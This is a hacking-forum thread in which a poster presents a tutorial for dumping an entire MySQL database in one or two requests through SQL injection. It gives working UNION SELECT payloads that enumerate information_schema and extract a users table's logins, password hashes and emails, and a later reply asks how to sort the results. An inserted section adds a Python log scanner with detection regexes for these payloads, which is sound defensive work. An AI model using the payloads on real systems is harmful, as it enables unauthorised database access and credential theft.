How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
TUTORIAL : [All DB In [1] Request]
Posted by: blackrose
Date: May 31, 2012 04:00PM

greetz to ๖ۣۜDan & DenJacker

What we will be doing is using nested select statements (subqueries), along with our own variable, to bypass the 1024 character limit of group_concat. If you're new to SQL, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests.

First off, the database/table/columns.

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)

PoC: ' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+

Of course, if magic_quotes is enabled you would need to avoid quotation marks, using hex values or the char() function instead.

View the source, and we see every single database/table/column accessible.


Now, to grab information from the columns.

(select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns))))x)

PoC: ' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+

Thanks for viewing this tutorial. If you need help, post below. If you have anything you want added, post below or PM me. Thanks.
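From the defender's side, the payloads above have a distinctive shape that is easy to pick out of web server access logs: a UNION SELECT, a MySQL user variable assigned inside a subquery (@:=0x00), that same variable compared against its own concat() so every row is appended to it, information_schema enumeration, and hex literals standing in for quoted strings. The following Python scanner is an added example and is not code from the original post; the log lines it runs on are constructed here to resemble the requests the tutorial describes, and the combined log format, indicator names and the two-indicator threshold are this example's own assumptions.

```python
"""Flag MySQL user-variable accumulation payloads in web access logs.

Added example (not from the original post). Assumes Apache/nginx combined
log format and URL-encoded query strings; indicator names and the alert
threshold are choices made for this example.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic): one benign request, two
# requests shaped like the tutorial's payloads, one benign search that
# happens to contain the word "select".
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2012:16:00:01 +0000] "GET /item.php?id=12 HTTP/1.1" 200 512',
    '10.0.0.9 - - [31/May/2012:16:00:07 +0000] "GET /item.php?id=12%27+UNION+SELECT+1,2,3,4,5,'
    '(select+(@)+from+(select(@:=0x00),(select+(@)+from+(information_schema.columns)+where+'
    '(table_schema>=@)+and+(@)in+(@:=concat(@,0x0a,table_schema,0x3a,table_name))))a)--+ HTTP/1.1" 200 40211',
    '10.0.0.9 - - [31/May/2012:16:00:09 +0000] "GET /item.php?id=12%27+UNION+SELECT+1,2,3,4,5,'
    '(select(@)+from+(select(@:=0x00),(select(@)+from+(test.pp_users)+where+(@)+in+'
    '(@:=concat(@,0x0a,user_login))))a)--+ HTTP/1.1" 200 8033',
    '10.0.0.7 - - [31/May/2012:16:01:00 +0000] "GET /search.php?q=select+committee+report HTTP/1.1" 200 2048',
]

# Each indicator is (name, regex) evaluated on the URL-decoded, lower-cased
# request target. Several weak signals together make a strong one.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    # a user variable assigned inside the query: @:=0x00, @x:=...
    ("user_variable_assign", re.compile(r"@\w*\s*:=")),
    # the accumulator idiom: (@) in (@:=concat(@, ...)) compares the variable
    # against its own new value, so every visited row is appended to it
    ("variable_accumulation",
     re.compile(r"\(\s*@\w*\s*\)\s*in\s*\(\s*@\w*\s*:=\s*concat\s*\(\s*@")),
    # hex literals inside concat(): string constants without quote characters
    ("hex_literal_in_concat", re.compile(r"concat\s*\([^)]*0x[0-9a-f]+")),
    # trailing SQL comment used to discard the rest of the original query
    ("sql_comment_tail", re.compile(r"--\s*$")),
]

# The quoted request field of a combined-format line: "METHOD target HTTP/x.y"
REQUEST_FIELD = re.compile(r'"[A-Z]+\s+(\S+)\s+HTTP/[\d.]+"')


def extract_target(log_line):
    """Return the URL-decoded, lower-cased request target, or None if the line
    does not carry a request field."""
    m = REQUEST_FIELD.search(log_line)
    if not m:
        return None
    return unquote_plus(m.group(1)).lower()


def score_request(log_line):
    """Return the names of all indicators that fire on one log line."""
    target = extract_target(log_line)
    if target is None:
        return []
    return [name for name, rx in INDICATORS if rx.search(target)]


def scan_log(lines, min_indicators=2):
    """Return (line_number, indicators) for each line with at least
    min_indicators hits. Requiring two avoids alerting on a lone 'select'."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = score_request(line)
        if len(found) >= min_indicators:
            hits.append((number, found))
    return hits


if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

Matching on the decoded request rather than the raw line matters because the payload arrives URL-encoded (%27, +), and the variable_accumulation pattern is the most specific signal here: ordinary application queries have no reason to compare a user variable with its own concatenation. Detection is a backstop only; the root fix for the tutorial's entry point is a parameterized query, which keeps the injected text in a bound value where none of these tokens are ever parsed as SQL.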

Re: TUTORIAL : [All DB In [1] Request]
Posted by: Freesia
Date: July 06, 2014 07:25AM

Thank you blackrose, very nice trick!
My question is: how can I order the results, for example, in your demo by ID?

